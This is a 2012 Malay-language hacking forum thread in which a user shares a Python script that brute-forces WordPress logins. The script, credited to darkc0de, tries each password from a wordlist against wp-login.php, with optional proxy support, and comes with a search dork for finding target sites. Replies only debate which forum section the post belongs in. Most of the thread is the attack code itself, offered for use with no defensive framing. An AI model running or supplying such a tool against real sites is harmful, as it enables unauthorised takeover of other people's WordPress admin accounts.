Welcome to TBD.my, Guest! Log In or Sign Up
 
Thread Rating:
  • 0 Votes - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
wpbruteforce.py
15-04-2012, 08:01 PM
Post: #1
wpbruteforce.py
nih hasil daripada saya google2 tadi...belum try lagi..
Code:
#!/usr/bin/python
#WordPress Brute Force (wp-login.php)

#If cookies enabled brute force will not work (yet)
#Change response on line 97 if needed. (language)

#Dork: inurl:wp-login.php

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import urllib2, sys, re, urllib, httplib, socket

print "\n   d3hydr8[at]gmail[dot]com WordPressBF v1.0"
print "----------------------------------------------"

if len(sys.argv) not in [4,5,6,7]:
    print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n"
    print "\t   -p/-proxy <host:port> : Add proxy support"
    print "\t   -v/-verbose : Verbose Mode\n"
    sys.exit(1)
    
for arg in sys.argv[1:]:
    if arg.lower() == "-p" or arg.lower() == "-proxy":
        proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
    if arg.lower() == "-v" or arg.lower() == "-verbose":
        verbose = 1
        
try:
    if proxy:
        print "\n[+] Testing Proxy..."
        h2 = httplib.HTTPConnection(proxy)
        h2.connect()
        print "[+] Proxy:",proxy
except(socket.timeout):
    print "\n[-] Proxy Timed Out"
    proxy = 0
    pass
except(NameError):
    print "\n[-] Proxy Not Given"
    proxy = 0
    pass
except:
    print "\n[-] Proxy Failed"
    proxy = 0
    pass
    
try:
    if verbose == 1:
        print "[+] Verbose Mode On\n"
except(NameError):
    print "[-] Verbose Mode Off\n"
    verbose = 0
    pass
    
if sys.argv[1][:7] != "http://":
    host = "http://"+sys.argv[1]
else:
    host = sys.argv[1]
    
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]

try:
      words = open(sys.argv[3], "r").readlines()
      print "[+] Words Loaded:",len(words),"\n"
except(IOError):
      print "[-] Error: Check your wordlist path\n"
      sys.exit(1)
  
for word in words:
    word = word.replace("\r","").replace("\n","")
    login_form_seq = [
         ('log', sys.argv[2]),
         ('pwd', word),
         ('rememberme', 'forever'),
         ('wp-submit', 'Login >>'),
        ('redirect_to', 'wp-admin/')]
    login_form_data = urllib.urlencode(login_form_seq)
    if proxy != 0:
        proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
        opener = urllib2.build_opener(host, proxy_handler)
    else:
        opener = urllib2.build_opener(host)
    try:
        site = opener.open(host, login_form_data).read()
    except(urllib2.URLError), msg:
        print msg
        site = ""
        pass

    if re.search("WordPress requires Cookies",site):
        print "[-] Failed: WordPress has cookies enabled\n"
        sys.exit(1)
        
    #Change this response if different. (language)
    if re.search("<strong>ERROR</strong>",site) and verbose == 1:
        print "[-] Login Failed:",word
    else:
        print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
print "\n[-] Brute Complete\n"

[Image: 82894083.gif]
Quote
18-04-2012, 05:52 PM
Post: #2
RE: wpbruteforce.py
py lagi Facepalm

Jangan disebabkan ‪#‎Cingey‬ ia menjadi batu yang menghalang untuk kita terus ke depan...
[Image: 76561198103081830.png][Image: AddFriend.png]
Quote
18-04-2012, 07:29 PM
Post: #3
RE: wpbruteforce.py
(18-04-2012 05:52 PM)AceyrafRoshlanz Wrote:  py lagi Facepalm
kenapa bang? GayFace

[Image: 82894083.gif]
Quote
18-04-2012, 09:49 PM
Post: #4
RE: wpbruteforce.py
patut ke section python GayFace

  ▲ thou shalt knows
[Image: 6Jv0hAf.gif]( ⌣́,⌣̀)\(^◡^ )
Quote
18-04-2012, 09:56 PM
Post: #5
RE: wpbruteforce.py
(18-04-2012 09:49 PM)Codeshift3r Wrote:  patut ke section python GayFace

ni bukan tempat share papers/script ke?

[Image: 82894083.gif]
Quote


Forum Jump:


User(s) browsing this thread: 1 Guest(s)